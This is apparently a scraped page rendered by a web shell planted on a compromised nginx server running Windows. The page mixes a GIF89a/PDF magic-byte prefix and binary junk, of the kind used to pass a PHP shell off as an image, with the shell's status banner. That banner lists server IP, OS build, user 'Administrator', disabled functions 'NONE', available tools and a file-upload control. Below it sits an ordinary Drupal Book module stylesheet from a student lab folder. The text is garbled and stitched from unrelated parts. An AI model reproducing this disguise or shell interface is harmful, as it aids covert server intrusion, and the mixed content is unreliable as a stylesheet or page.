GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST2146/VM_Data/Data_WWW/Student/JimMartinson/Lab07/modules/book/ |
Upload File : |
/** * @file * Styling for the Book module. */ .book-navigation .menu { border-top: 1px solid #888; padding: 1em 0 0 3em; /* LTR */ } .book-navigation .page-links { border-top: 1px solid #888; border-bottom: 1px solid #888; text-align: center; padding: 0.5em; } .book-navigation .page-previous { text-align: left; width: 42%; display: block; float: left; /* LTR */ } .book-navigation .page-up { margin: 0 5%; width: 4%; display: block; float: left; /* LTR */ } .book-navigation .page-next { text-align: right; width: 42%; display: block; float: right; } #book-outline { min-width: 56em; } .book-outline-form .form-item { margin-top: 0; margin-bottom: 0; } html.js #edit-book-pick-book { display: none; } .form-item-book-bid .description { clear: both; } #book-admin-edit select { margin-right: 24px; } #book-admin-edit select.progress-disabled { margin-right: 0; } #book-admin-edit tr.ajax-new-content { background-color: #ffd; } #book-admin-edit .form-item { float: left; }